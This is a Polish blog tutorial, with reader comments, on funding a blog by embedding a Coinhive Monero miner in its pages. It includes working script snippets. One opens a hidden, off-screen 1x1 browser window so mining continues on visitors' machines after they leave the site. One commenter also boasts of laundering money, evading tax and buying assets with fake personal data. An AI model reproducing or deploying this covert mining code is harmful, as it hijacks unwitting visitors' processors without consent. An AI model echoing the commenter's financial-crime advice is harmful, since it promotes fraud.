Zdobywanie funduszy będąc bloggerem

Zdobywanie funduszy będąc bloggerem

INFORMACJA: Poniższy post nie wydostał się z Poczekalni :(

Posiadając bloga jeszcze do niedawna, aby zdobywać z niego jakieś fundusze byliśmy zmuszeni dodawać do niego reklamy. Reklamy co prawda przynosiły pieniądze, jednak również odpychały niektórych czytelników. Na szczęście teraz mamy inną możliwość. Możemy do naszego bloga dodać krótki skrypt, który powoduje, że za każdym razem gdy ktoś go ogląda wykorzystujemy część jego mocy obliczeniowej do “mining”‘u kryptowaluty zwanej monero. W tym artykule postaram się przybliżyć temat jak to zrobić.

Po pierwsze musimy założyć konto na stronie coinhive.com. Następnie musimy stworzyć nowe API key w zakładce Setting->Sites & API keys. Następnie stwórzmy prostą testową stronę, aby sprawdzić czy nas program działa.

<html>
<head>
</head>
<body>
<script>
var miner = new CoinHive.Anonymous('BSknetDydImYW9tcrAw02Q3ZaPgvQ1Hi', {throttle: 0.5, threads: 8});miner.start();
</script>
</body>
</html>

Gdzie BSknetDydImYW9tcrAw02Q3ZaPgvQ1Hi to klucz publiczny, który przed chwilą wygenerowaliśmy. Zapisujemy naszą stronę i uruchamiamy. Jeżeli wentylator w naszym komputerze zaczął kręcić się szybciej, task manager pokazał zużycie procesora rzędu 50% to sukces. Aby się upewnić czy na pewno podaliśmy dobry klucz możemy pozwolić skryptowi pochodzić chwilę, ą potem wejść w zakładkę Dashboard i zobaczyć ile hash’y na sekundę udaje na się wygenerować.

Jeżeli jednak nasza strona jest odwiedzana na 30 sekund to może się okazać, że większość tego czasu zajmuje ładowanie “koparki” i nie uzyskujemy z tego żadnych profitów możemy więc pójść o krok dalej i stworzyć program, który otworzy kartę w przeglądarce, która zostanie nawet po zamknięciu naszej strony i to na niej będzie nasza koparka.

<script> var a=window.open("http://atomd.w.staszic.waw.pl/majsterkowo.html?key=naszKluczPubliczny","toolbar=0",'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1, height=1, left=10000,top=10000,visible=none'); </script>

Jeżeli jednak wydaje się to komuś nieetyczne to mamy również 3 rozwiązanie, które już zauważyliście, jeżeli próbowaliście otworzyć link do strony coinhive.com. Możemy utworzyć link, przed otwarciem którego komputer musi policzyć określoną ilość hash’y. Jeżeli wydaje się wam to bardziej etyczne już mówię jak to zrobić. wystarczy wejść w zakładkę Shortlinks na waszym koncie i po podaniu strony do przekierowania oraz stosownej ilości hash’y po chwili ukaże się wasz skrócony link.

 

Na koniec krótkie omówienie parametrów funkcji

CoinHive.Anonymous('naszKluczPubliczny', {lista parametrów});

nasz klucz publiczny już poruszyliśmy teraz czas omówić listę parametrów. Każdy parametr ma formę nazwa: wartości i rozdzielamy je przecinkami, czyli wygląda to tak.

{parametr1: wartosc1, parametr2:warosc2,...}

Nie będę omawiał wszystkich parametrów, ponieważ ich lista jest dostępna na stronie.

throttle – procent czasu przez jaki procesor ma być wolny, czyli 0.0 oznacza zużycie całego procesora, a 0.99 ograniczy skrypt do 1% mocy obliczeniowej.

threads – reguluje liczbę wątków, z których ma korzystać skrypt

I tym miłym akcentem zakończę artykuł, czekam na wszelką konstruktywną krytykę jak i tą niekonstruktywną w komentarzach.

Michał Pietrzak

INFORMACJA: Poniższy post nie wydostał się z Poczekalni :(

Ocena: 3.38/5 (głosów: 16)

Podobne posty

14 komentarzy do “Zdobywanie funduszy będąc bloggerem

 • Przez chwilę zastanawiałem się nawet, czy nie odpalić tego jako alternatywy dla wyświetlanych reklam. Tzn. użytkownik mógłby wybrać, czy woli nadal oglądać reklamy, czy zamiast tego podzielić się odrobiną mocy procka.
  Na razie obserwuję temat i patrzę, jak się rozwijają nastroje w sieci na takie podejście :)

  Odpowiedz
  • Reklamy w niczym nie przeszkadzają ,a w kopanie szkoda się bawić .
   Reklamy to nie jest zło bo czasem i tak trzeba coś kupić to po co szukać jak ty podajesz dane na tacy :) .
   Chyba że zależy ci na uniezależnianiu się od reklamodawców to jest to dobry krok :)
   Pamiętaj ,że krypto-waluty są pewnego rodzaju bańką . Można sporo zarobić jak i stracić :)

   ps.
   Czy ktoś z państwa zna kogoś z Korei ,Japonii, albo gdzie takie osoby wyszukać mieszkające w Polsce ? Pytam bo chciałbym się podszkolić w tych językach ,a nie mam z kim poćwiczyć wymowy . Płeć i wiek bez znaczenia . Dobrze żeby to była osoba ,która włada językiem Polskim .

   Odpowiedz
    • Te waluty są świetnym rozwiązaniem do przeprowadzania transakcji lokalnych, międzynarodowych , unikania płacenia podatków , czy do prania pieniędzy . Przy odpowiedniej wiedzy , wykorzystaniu kont na słupach gwarantują pełną anonimowość i w tym celu są nabywane .

     Nie są jednak polecane jako forma inwestycji , lokata na przyszłość z względu na niestabilność kursu.
     Dziś mamy 100 tysięcy złotych ,a za rok albo jesteśmy milionerami ,albo mamy pecha. To jest zwykła piramida jak Amber Gold której byłem klientem i zarobiłem na tym sporo kasy bo wiedziałem kiedy się wycofać , powiedzieć dość . Inwestowałem też w śmieci czy inne trefne akcje które śmierdziały piramidą ,ale nigdy nie straciłem . Sprzedałem też wirtualną gotówkę yang w grze Metin czy w innych mając własną farmę 100 botów :) do dropienia .

     Osoba która by się w to bawiła musi się liczyć z ew. stratami . Po prostu należy wiedzieć kiedy kupić waluty ,a kiedy sprzedać i powiedzieć koniec . Ja to traktuje jako zabawę ,a nie sposób na życie . Jak stracę to mówi się trudno ,ale nie topie w to zysków całego życia .

     Ja np. sprzedałem walutę tuż przed jej kryzysem ,a za za kilka dni kupiłem gdy kurs był praktycznie najniższy . Ostatnio znowu sprzedałem i kupiłem , koparkę , część w złoto zainwestowałem ( tak w złoto ) oczywiście kupione na fake dane osobowe ,a za resztę mieszkanie do wynajęcia dla studentów .

     Zajmuje się tym ok kilku lat . W tym czasie 70% znajomych straciło majątki , sądząc że zarobią na tym milionami , pobrali kredyty po 100 czy 200 tysięcy złotych . Przyszedł kiepski moment , komornik zabrał im wszystko . Dwóch popełniło samobójstwo , pozostali spłacają kredyty do dnia dzisiejszego ,a jeden jest bezdomnym.

     Z moim starych znajomych dorobiłem się ja , Grzesiek , Artur, Eryk .
     Artur siedzi w więzieniu za pranie pienięðzy – skarbówka się dowaliła bo zaczął szaleć z kasą
     Wszystko ma swój początek , jak i kres . Gdzie jest zysk jest i strata . Najważniejsze to nie panikować , zachować jasny umysł :)

     Odpowiedz
 • Dobrze, że Unia chce takie metody zablokować. Zresztą już twórcy przeglądarek blokują te skrypty. Osoby ze słabszym komputerem, tabletem, telefonem nie będą w stanie przeglądać strony.

  Odpowiedz
  • UE – ten związek radziecki chce wszystko blokować , kontrolować by wpychać ludziom te swoje drukowane bez pokrycia EURO przez niemieckie banki. Nie zrozum mnie źle ,ale nikt nikogo nie zmusza na wchodzenie na daną stronę internetową. Rynek sam decyduje co jest dobre ,a co jest złe należy tylko to robić z głową .

   Odpowiedz
    • Ds3
     Ależ ma i to bardzo dużo ,ale jak widać do niektórych trzeba pisać “prostym językiem”.

     1. Każðy twórca bloga , portalu ma prawo wprowadzić sobie takie zasady jakie uważa za stosowne.

     2 Masz słaby , komputer , tablet , nie stać cię na zakup nowego . To raczej pretensje tylko do siebie, bo życie to nie bajka.
     4 Właściciel bloga może uwzględnić twoje wskazówki ,ale wcale nie musi , bo rachunki się same nie opłacą .

     1. Popieranie pomysłu blokowania tego typu skryptów przez polityków świadczy ,że chyba nie wiesz do końca na czym polega obecny system czyli ( kapitalizm) , który dobrowolnie wybraliście .
     Odpowiedz
 • Spłoniecie wszyscy w piekle – dla tych co “kopią” cudzym prockiem, diabły mają osobny kocioł.
  Nie wiem, może ja się starzeję (programista, 2x lat), ale współczesne trendy w IT coraz częściej przyprawiają mnie o mdłości.

  PS. UE nie ma prawa czegokolwiek blokować, Internet powinien pozostać wolny. Nawiasem mówiąc to jest kolejna rzecz która mnie martwi – ludzie nie doceniają tej wolności.

  Odpowiedz
 • Nie rozumiem jak ma tam ta strona testowa działać. Nie programuję w js ale czy nie odwołujemy się tam do jakiejś klasy którą trzeba wcześniej zdefiniować? Jak dodanie tego kodu do strony ma działać?

  Odpowiedz

Odpowiedz

anuluj

Masz uwagi?